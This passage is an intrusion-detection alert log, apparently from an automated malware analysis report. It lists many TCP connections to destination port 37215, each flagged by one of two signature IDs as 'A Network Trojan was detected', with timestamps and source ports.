          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322138
          SID:2829579
          Source Port:44896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591881
          SID:2835222
          Source Port:57730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630029
          SID:2835222
          Source Port:59908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297329
          SID:2835222
          Source Port:48624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607506
          SID:2835222
          Source Port:36758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039568
          SID:2835222
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010508
          SID:2835222
          Source Port:40398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061265
          SID:2835222
          Source Port:33326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941062
          SID:2829579
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328069
          SID:2829579
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223834
          SID:2829579
          Source Port:60800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614675
          SID:2829579
          Source Port:58624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543612
          SID:2829579
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684990
          SID:2829579
          Source Port:43638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636086
          SID:2835222
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311183
          SID:2829579
          Source Port:43986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855193
          SID:2829579
          Source Port:36186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140067
          SID:2835222
          Source Port:56800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223161
          SID:2835222
          Source Port:56390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331510
          SID:2829579
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492736
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698258
          SID:2835222
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743514
          SID:2835222
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742433
          SID:2835222
          Source Port:56404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885992
          SID:2835222
          Source Port:37764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325748
          SID:2829579
          Source Port:52378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618485
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592104
          SID:2835222
          Source Port:38826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247185
          SID:2829579
          Source Port:51144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743569
          SID:2829579
          Source Port:40874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426502
          SID:2835222
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845852
          SID:2835222
          Source Port:39104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482864
          SID:2829579
          Source Port:34284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136030
          SID:2835222
          Source Port:42674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147614
          SID:2829579
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736587
          SID:2829579
          Source Port:56260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472230
          SID:2829579
          Source Port:57354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221445
          SID:2829579
          Source Port:39900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656317
          SID:2829579
          Source Port:57644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922705
          SID:2835222
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272285
          SID:2829579
          Source Port:47538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591238
          SID:2835222
          Source Port:38410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923573
          SID:2835222
          Source Port:48266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290214
          SID:2829579
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405171
          SID:2835222
          Source Port:51786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858363
          SID:2835222
          Source Port:53136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.614044
          SID:2829579
          Source Port:42388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764015
          SID:2829579
          Source Port:37042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247022
          SID:2835222
          Source Port:58522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246063
          SID:2829579
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322212
          SID:2829579
          Source Port:34004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498166
          SID:2835222
          Source Port:57716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795245
          SID:2835222
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848356
          SID:2829579
          Source Port:48956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266893
          SID:2829579
          Source Port:54790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767120
          SID:2835222
          Source Port:38702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818194
          SID:2829579
          Source Port:60672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892538
          SID:2829579
          Source Port:57182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287659
          SID:2835222
          Source Port:42716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216823
          SID:2829579
          Source Port:40166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.608611
          SID:2829579
          Source Port:42914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214712
          SID:2829579
          Source Port:41494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434300
          SID:2835222
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710175
          SID:2829579
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301309
          SID:2835222
          Source Port:44814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660243
          SID:2829579
          Source Port:49702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298808
          SID:2835222
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817649
          SID:2829579
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283650
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744889
          SID:2829579
          Source Port:44010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923352
          SID:2835222
          Source Port:49154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610480
          SID:2835222
          Source Port:56854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464349
          SID:2835222
          Source Port:36660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711201
          SID:2835222
          Source Port:46744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299611
          SID:2835222
          Source Port:52378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680171
          SID:2829579
          Source Port:39272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979023
          SID:2835222
          Source Port:55580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326718
          SID:2835222
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667515
          SID:2835222
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010512
          SID:2835222
          Source Port:44754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379154
          SID:2835222
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325813
          SID:2829579
          Source Port:41200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373297
          SID:2829579
          Source Port:51962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195313
          SID:2835222
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744394
          SID:2829579
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814108
          SID:2835222
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484799
          SID:2829579
          Source Port:60756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144057
          SID:2829579
          Source Port:36654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733102
          SID:2829579
          Source Port:44774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327807
          SID:2829579
          Source Port:59610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338629
          SID:2835222
          Source Port:51236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484047
          SID:2835222
          Source Port:37396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845512
          SID:2835222
          Source Port:36642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989084
          SID:2835222
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744242
          SID:2835222
          Source Port:56076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334680
          SID:2829579
          Source Port:46008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039828
          SID:2835222
          Source Port:41548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893335
          SID:2835222
          Source Port:45014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810573
          SID:2829579
          Source Port:56590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890445
          SID:2829579
          Source Port:43352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535479
          SID:2835222
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913772
          SID:2829579
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.037735
          SID:2829579
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939437
          SID:2835222
          Source Port:46992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216259
          SID:2835222
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299343
          SID:2829579
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977335
          SID:2835222
          Source Port:35536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062796
          SID:2835222
          Source Port:42234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659754
          SID:2829579
          Source Port:56084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840205
          SID:2835222
          Source Port:44432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465101
          SID:2829579
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213437
          SID:2835222
          Source Port:54492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.376142
          SID:2829579
          Source Port:35332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487258
          SID:2829579
          Source Port:42802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878716
          SID:2829579
          Source Port:52856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527435
          SID:2835222
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115824
          SID:2835222
          Source Port:37292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266878
          SID:2829579
          Source Port:51106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215279
          SID:2835222
          Source Port:59492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.615349
          SID:2829579
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067548
          SID:2829579
          Source Port:51718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237221
          SID:2829579
          Source Port:36486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269338
          SID:2829579
          Source Port:60582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708974
          SID:2829579
          Source Port:38932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684989
          SID:2829579
          Source Port:58808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178380
          SID:2829579
          Source Port:38374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267605
          SID:2835222
          Source Port:48946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221282
          SID:2835222
          Source Port:36498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019408
          SID:2829579
          Source Port:52864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338705
          SID:2835222
          Source Port:42350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551216
          SID:2829579
          Source Port:42490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839938
          SID:2829579
          Source Port:36246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482569
          SID:2829579
          Source Port:42356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292952
          SID:2829579
          Source Port:34132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270632
          SID:2835222
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680329
          SID:2829579
          Source Port:42054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560513
          SID:2829579
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143863
          SID:2835222
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441697
          SID:2835222
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268477
          SID:2829579
          Source Port:58584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280961
          SID:2829579
          Source Port:35524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093714
          SID:2829579
          Source Port:38364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.981901
          SID:2829579
          Source Port:56962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146363
          SID:2829579
          Source Port:45174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273229
          SID:2829579
          Source Port:45152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214750
          SID:2835222
          Source Port:37996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597387
          SID:2835222
          Source Port:50524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939359
          SID:2835222
          Source Port:48232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414252
          SID:2829579
          Source Port:46276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222572
          SID:2835222
          Source Port:45358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848642
          SID:2829579
          Source Port:57854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339225
          SID:2835222
          Source Port:34134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152523
          SID:2835222
          Source Port:54734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944885
          SID:2835222
          Source Port:55726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464194
          SID:2835222
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724041
          SID:2829579
          Source Port:44204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022335
          SID:2835222
          Source Port:49858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711337
          SID:2835222
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953576
          SID:2829579
          Source Port:54960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022271
          SID:2829579
          Source Port:50644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778021
          SID:2829579
          Source Port:39836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115626
          SID:2829579
          Source Port:55790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155630
          SID:2835222
          Source Port:46762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039608
          SID:2835222
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203944
          SID:2835222
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729157
          SID:2835222
          Source Port:39888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744706
          SID:2829579
          Source Port:58086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710231
          SID:2829579
          Source Port:52706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145131
          SID:2835222
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672182
          SID:2829579
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484588
          SID:2829579
          Source Port:41162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562969
          SID:2835222
          Source Port:52042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909164
          SID:2829579
          Source Port:50598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338265
          SID:2835222
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680616
          SID:2835222
          Source Port:35810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793865
          SID:2835222
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177941
          SID:2829579
          Source Port:57306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216737
          SID:2829579
          Source Port:50036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725098
          SID:2829579
          Source Port:42474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852787
          SID:2829579
          Source Port:53686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466182
          SID:2829579
          Source Port:34656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660319
          SID:2829579
          Source Port:35820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.323569
          SID:2829579
          Source Port:42168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659802
          SID:2835222
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.768834
          SID:2835222
          Source Port:53848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924101
          SID:2835222
          Source Port:51784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008908
          SID:2829579
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.218203
          SID:2835222
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767120
          SID:2829579
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816702
          SID:2829579
          Source Port:58522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290616
          SID:2835222
          Source Port:51826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176455
          SID:2829579
          Source Port:39590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436234
          SID:2829579
          Source Port:59670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560506
          SID:2835222
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.151921
          SID:2835222
          Source Port:35514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.616977
          SID:2835222
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923257
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
